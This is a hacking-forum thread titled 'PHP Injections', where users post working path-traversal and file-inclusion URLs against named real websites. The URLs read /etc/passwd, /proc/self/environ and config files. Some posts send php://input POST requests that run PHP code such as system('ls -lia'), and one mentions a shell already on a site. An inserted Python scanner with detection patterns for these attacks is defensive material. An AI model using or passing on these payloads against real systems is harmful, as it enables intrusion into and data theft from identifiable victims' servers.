PHP Injections

Discussion in 'Vulnerabilities' started by Joker-jar, 20 Apr 2007.

  1. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.quantum-electron.ru/pa.phtml?page=../../../../../../../../../../etc/passwd%00
     
  2. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    Code:
    http://www.alushta.ua/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
     
    2 people like this.
  3. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    Well, here are my two cents too :)

     
  4. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Code:
    http://polyakovprud.dp.ua/index.php?page=/../../../../../../../../../proc/self/environ
    Code:
    http://mir-audio.com.ua/admin/file_manager.php/login.php?action=download&filename=includes/configure.php
    for the last one: https://forum.antichat.ru/showthread.php?t=71111 you can add an admin and simply log in as that admin :)
     
    2 people like this.
  5. daniel_1024

    daniel_1024 Elder

    Joined:
    15 Jul 2009
    Messages:
    260
    Likes Received:
    227
    Reputations:
    386
    php://input

    arbitrary PHP code execution, I rarely see it.
    so, we send the following POST requests:

    Code:
    POST /index.php?link=php://input HTTP/1.1
    Host: www.alternativeautosource.net
    Content-Length: 19
    
    <?php phpinfo(); ?>
    Code:
    POST /lang_de/main.php?view=php://input HTTP/1.1
    Host: www.galvania.ca
    Content-Length: 19
    
    <?php phpinfo(); ?>
    Code:
    POST /page_en.php?link=php://input HTTP/1.1
    Host: www.rochelle.cz
    Content-Length: 19
    
    <?php phpinfo(); ?>
    and we see the servers' PHPINFO :)
    Code:
    POST /WWW/main.php?CONTENT=php://input HTTP/1.1
    Host: polyplast-mainz.de
    Content-Length: 27
    
    <?php system("ls -lia"); ?>
    and here a directory listing))
     
    2 people like this.
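As a defender's counterpart to the requests in this thread, here is an added example that is not from the thread or its posters: a small Python scanner that flags, in constructed web-server access-log lines, the indicators used throughout the thread (`../` chains ending in a `%00` null byte, `/proc/self/environ` reads, `php://input` in a parameter, `file://` and remote URLs passed to include parameters). The names `SAMPLE_LOG`, `classify_request` and `scan_log` are mine, and the IPs, hosts and paths in the log are made up.

```python
import re
from urllib.parse import unquote

# Constructed sample lines in Apache combined-log style; hosts, IPs and paths are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Sep/2010:10:01:02 +0000] "GET /index.php?page=about HTTP/1.1" 200 5123
203.0.113.7 - - [12/Sep/2010:10:01:09 +0000] "GET /index.php?page=../../../../../../etc/passwd%00 HTTP/1.1" 200 1842
203.0.113.7 - - [12/Sep/2010:10:01:15 +0000] "GET /index.php?p=../../../../proc/self/environ HTTP/1.1" 200 9040
203.0.113.9 - - [12/Sep/2010:10:02:30 +0000] "POST /index.php?link=php://input HTTP/1.1" 200 21877
203.0.113.9 - - [12/Sep/2010:10:02:44 +0000] "GET /scripts/showPop.php?banner_content=file:///etc/passwd HTTP/1.1" 200 1842
203.0.113.11 - - [12/Sep/2010:10:03:00 +0000] "GET /products.php?module=http://attacker.example/x.txt HTTP/1.1" 200 30
"""

# Combined-log prefix: client IP, ident, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators seen in this thread's payloads, matched against the URL-decoded request target.
INDICATORS = {
    "path_traversal": re.compile(r"(?:\.\./|\.\.\\){2,}"),   # ../../ chains
    "null_byte": re.compile(r"\x00"),                         # %00 truncation trick
    "proc_self": re.compile(r"/proc/self/"),                  # environ/status reads
    "php_stream_wrapper": re.compile(r"php://", re.I),        # php://input etc.
    "file_scheme": re.compile(r"file://", re.I),              # file:///etc/passwd
    "remote_include": re.compile(r"[?&][^=&]+=(?:https?|ftp)://", re.I),  # RFI
}


def classify_request(target):
    """Return the sorted indicator names that match a request target (path + query)."""
    # Decode twice so %252e%252e%252f (double-encoded ../) is also caught.
    decoded = unquote(unquote(target))
    return sorted(name for name, rx in INDICATORS.items() if rx.search(decoded))


def scan_log(text):
    """Parse log lines and return one dict per request that matches any indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined-log format
        tags = classify_request(m["target"])
        if tags:
            hits.append({"ip": m["ip"], "method": m["method"],
                         "target": m["target"], "tags": tags})
    return hits
```

Calling `scan_log(SAMPLE_LOG)` returns the five flagged requests with their indicator tags; the `page=about` request is not reported.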
  6. *uNkN0Wn*

    *uNkN0Wn* Member

    Joined:
    25 Mar 2009
    Messages:
    175
    Likes Received:
    92
    Reputations:
    11
    HTML:
    http://www.sexycamnow.com/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
    HTML:
    http://grindhouze.com/cms/index.php/recent/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
    HTML:
    http://www.semiprice.fr/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
     
    1 person likes this.
  7. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.tierheim-spanien.de/thspa.php?inc=../../../../../../../../../../etc/passwd%00
     
  8. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    RFI

    http://www.axode.com/en/products.php?module_catalogue_page=
     
    1 person likes this.
  9. Chi

    Chi New Member

    Joined:
    30 Aug 2010
    Messages:
    9
    Likes Received:
    2
    Reputations:
    0
    One of the largest education portals in Latvia:
    Code:
    http://shkola.lv/index.php?mode=goods&page=../../../../../etc/passwd%00
     
    1 person likes this.
  10. Keltos

    Keltos Banned

    Joined:
    8 Jul 2009
    Messages:
    1,558
    Likes Received:
    920
    Reputations:
    520
     
    4 people like this.
  11. ubi

    ubi Elder

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://www.wirtualnailawa.pl/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00
     
    1 person likes this.
  12. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    http://www.virtualiroma.it/index.php?open=/web/htdocs/www.virtualiroma.it/home/index.php

    http://www.giardinodiroma.eu/index.php?open=../../../../../../../etc/issue
     
    #1192 547, 12 Sep 2010
    Last edited: 12 Sep 2010
  13. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    http://www.smacworld.com/new/index.php?p=../../../../../../../../../../proc/self/environ
    For anyone interested, there is a shell there,
    but I can't install a rootkit, there are no exploits yet
     
    1 person likes this.
  14. попугай

    попугай Elder

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    http://wierzba.wzks.uj.edu.pl/~dymet/zarty/index.php?go=/etc/passwd%00

    http://www.fav.co.il/index.php?dir=app_sites&page=../../../../../../../etc/hosts%00
     
    2 people like this.
  15. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.equinix.com/download.php?file=../../../../../../../../../../../../../etc/passwd
    http://www.hrcpa.com/press/index.php?file=../../../../../../../../../../etc/passwd (--> source code)
     
    3 people like this.
  16. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    good luck :D
     
    3 people like this.
  17. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,149
    Reputations:
    886
    http://www.radioexpress.com/public/content.php?loc=../../../../../../etc/my.cnf
     
  18. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
     
    #1198 <Cyber-punk>, 20 Sep 2010
    Last edited: 20 Sep 2010
    1 person likes this.
  19. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    http://www.rhianna.ro/index.php?page=../../../../../../../../../../proc/self/environ
    http://www.vapnet.com.br/index.php?pagina=../../../../../../../../../../proc/self/status
    http://www.mutokukai.ru/iframe.php?target=../../../../../../../../../../etc/passwd
     
    #1199 valyka80, 21 Sep 2010
    Last edited by a moderator: 21 Sep 2010
    1 person likes this.
  20. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
     